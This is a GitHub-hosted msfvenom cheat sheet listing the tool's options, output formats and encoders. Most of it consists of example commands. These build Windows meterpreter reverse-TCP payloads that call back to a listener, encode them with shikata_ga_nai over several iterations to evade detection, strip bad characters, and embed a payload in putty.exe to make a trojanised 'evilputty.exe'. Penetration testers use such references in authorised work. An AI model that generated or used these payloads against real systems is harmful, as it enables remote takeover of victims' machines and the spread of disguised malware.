forked from Snifer/security-cheatsheets
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmsfvenom
111 lines (90 loc) · 5.83 KB
/
msfvenom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#MSFVenom CheatSheet
#Jason Soto <www.jsitech.com>
#Basic Syntax
msfvenom [options] <var=value>
#Options
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch <architecture> The architecture to use
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
--payload-options List the payload's standard options
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
-h, --help Show this message
--help-formats List available formats
# Format Options (Specified with -f)
#Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war
#Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
#Creating a Payload
$ msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
#Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.20 LPORT=443 -f exe -o exepayload.exe
#Check payload options
$ msfvenom -p [payload] --payload-options
Example
$ msfvenom -p windows/meterpreter/reverse_tcp --payload-options
#Encoding a Payload
$ msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile
#Encoders available
#Framework Encoders
Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
#Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe
#Example
#Remove Bad Characters
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b ‘\x00′ -f exe -o payload.exe
#Creating a Payload using a template
msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile
#Example
#Creating executable payload using putty.exe as template
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -x putty.exe -f exe > evilputty.exe